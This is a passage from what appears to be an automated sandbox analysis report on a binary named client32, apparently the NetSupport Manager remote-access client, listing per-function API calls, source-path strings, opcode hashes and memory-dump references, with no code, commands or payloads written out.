                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: QueryValuewvsprintf
                                                                                                                              • String ID: ($Error %d getting %s
                                                                                                                              • API String ID: 141982866-3697087921
                                                                                                                              • Opcode ID: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                                                                              • Instruction ID: 957b37bb43794c395efd3ecf64b5ca03ad7d4ce898e6801f907036c689cda8f8
                                                                                                                              • Opcode Fuzzy Hash: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                                                                              • Instruction Fuzzy Hash: BC11C672E01108AFDB10DEADDD45DEEB3BCEF99614F00816EF815D7244EA71A914CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11096550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 11096565
                                                                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                                                                • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                                                              • _memmove.LIBCMT ref: 11096594
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                              • String ID: vector<T> too long
                                                                                                                              • API String ID: 1785806476-3788999226
                                                                                                                              • Opcode ID: 2b11b4a62976d03dbe1a2d60c57ba794ffa8eb3dd1e129956f34f93b7f7fd68e
                                                                                                                              • Instruction ID: d358ddf0df870076cc5f93b669e2da6c265d75c8f3dc5f3c9d6febbcbc9ac7f9
                                                                                                                              • Opcode Fuzzy Hash: 2b11b4a62976d03dbe1a2d60c57ba794ffa8eb3dd1e129956f34f93b7f7fd68e
                                                                                                                              • Instruction Fuzzy Hash: B601B5B1A002059FC724CEADDC90CA7B7EDEFD43187148A2EE45A87644DA71F904C750
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110D1540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • wvsprintfA.USER32(?,11195264,?), ref: 110D1572
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                              • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                              • API String ID: 175691280-2052047905
                                                                                                                              • Opcode ID: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                                                                              • Instruction ID: b89aa90761fb3a94205c41d70d04c41302f16292cd1454487622bd2b1eadc16a
                                                                                                                              • Opcode Fuzzy Hash: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                                                                              • Instruction Fuzzy Hash: 0EF0A975A0025DABCF00DEE4DC40BFEFBAC9B85208F40419DF945A7240DE706A45C7A5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11015030 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageA.USER32(00000000,00001006,00000000,?), ref: 1101509D
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11015044
                                                                                                                              • m_hWnd, xrefs: 11015049
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                              • API String ID: 819365019-3966830984
                                                                                                                              • Opcode ID: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                                                                              • Instruction ID: f09b96a616f6a33d867b0b5af4e6941d1959c252ec7f828cb2a239631c18db6c
                                                                                                                              • Opcode Fuzzy Hash: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                                                                              • Instruction Fuzzy Hash: 1701A2B1D10219AFCB90CFA9C8457DEBBF4AB0C310F10816AE519F6240E67556808F94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110D15C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                              • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                              • API String ID: 175691280-2052047905
                                                                                                                              • Opcode ID: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
                                                                                                                              • Instruction ID: d047ce25565584385d90dc1a88bf85935da342945f7d0a1e0c7239cac7a22c38
                                                                                                                              • Opcode Fuzzy Hash: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
                                                                                                                              • Instruction Fuzzy Hash: 1AF0A475A0025CBBCB00DED4DC40BEEFBA8AB45208F004099F549A7140DE706A55C7A9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11014390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ImageList_Create.COMCTL32(?,?,?,?,?), ref: 110143BE
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateErrorExitImageLastList_MessageProcesswsprintf
                                                                                                                              • String ID: ..\ctl32\imagelst.cpp$m_hImageList
                                                                                                                              • API String ID: 756090014-1731862680
                                                                                                                              • Opcode ID: 07d921ffa2181537d20c18b6818c9ba3a9d0b657febdfe7dc916a1ba0a5e0468
                                                                                                                              • Instruction ID: ed28c1bf2740c29e09f0e670a8a7b9fc6316d817cb7ee806623638b648209f33
                                                                                                                              • Opcode Fuzzy Hash: 07d921ffa2181537d20c18b6818c9ba3a9d0b657febdfe7dc916a1ba0a5e0468
                                                                                                                              • Instruction Fuzzy Hash: 50F062B1600719AFC320CF59D805A97B7E8EF98310B00852DF99AC3600D370E8508FA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1115F340 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetPropA.USER32 ref: 1115F395
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorExitLastMessageProcessPropwsprintf
                                                                                                                              • String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
                                                                                                                              • API String ID: 1134434899-3115850912
                                                                                                                              • Opcode ID: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                                                              • Instruction ID: 87c86bef28f98f72f88127ca4e69caffea3bfce03f9a6da2004c13aaf4101256
                                                                                                                              • Opcode Fuzzy Hash: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                                                              • Instruction Fuzzy Hash: FCF0E575BC0336B7D7509A66DC82FE6F358D722BA4F448016FC26A2141F274E980C2D2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110151E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4
                                                                                                                              • m_hWnd, xrefs: 110151F9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                              • API String ID: 819365019-3966830984
                                                                                                                              • Opcode ID: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                                                              • Instruction ID: 9699e87d833f238af44183ea9879e136ee952ee53a84507d201ef9d6a93955d8
                                                                                                                              • Opcode Fuzzy Hash: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                                                              • Instruction Fuzzy Hash: 19F0FEB5D0025DABCB14DF95DC85EDAB7F8EB4D310F00852AFD29A7240E770A950CBA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110173D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
                                                                                                                              • SetLastError.KERNEL32(00000078), ref: 11017409
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                              • String ID: QueueUserWorkItem
                                                                                                                              • API String ID: 199729137-2469634949
                                                                                                                              • Opcode ID: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                                                              • Instruction ID: 14daf5f2905bb7c6da6366d36066c9679ffc6904d36036c61edd8dc8337596d2
                                                                                                                              • Opcode Fuzzy Hash: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                                                              • Instruction Fuzzy Hash: 06F01C72A50628AFD714DFA4D948E9BB7E8FB54721F00852AFD5597A04C774F840CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1101D320 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101D334
                                                                                                                              • SetLastError.KERNEL32(00000078), ref: 1101D351
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                              • String ID: FlashWindowEx
                                                                                                                              • API String ID: 199729137-2859592226
                                                                                                                              • Opcode ID: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                                                              • Instruction ID: 7fa6031e8bb94c9d2945b427b42de2899da1a72ad2875e3a9dcb47a7bac4ba5f
                                                                                                                              • Opcode Fuzzy Hash: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                                                              • Instruction Fuzzy Hash: 83E01272A412389FD324EBE9A848B4AF7E89B54765F01442AEA5597904C675E8408B90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11002130 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • IsWindow.USER32(?), ref: 1100213A
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
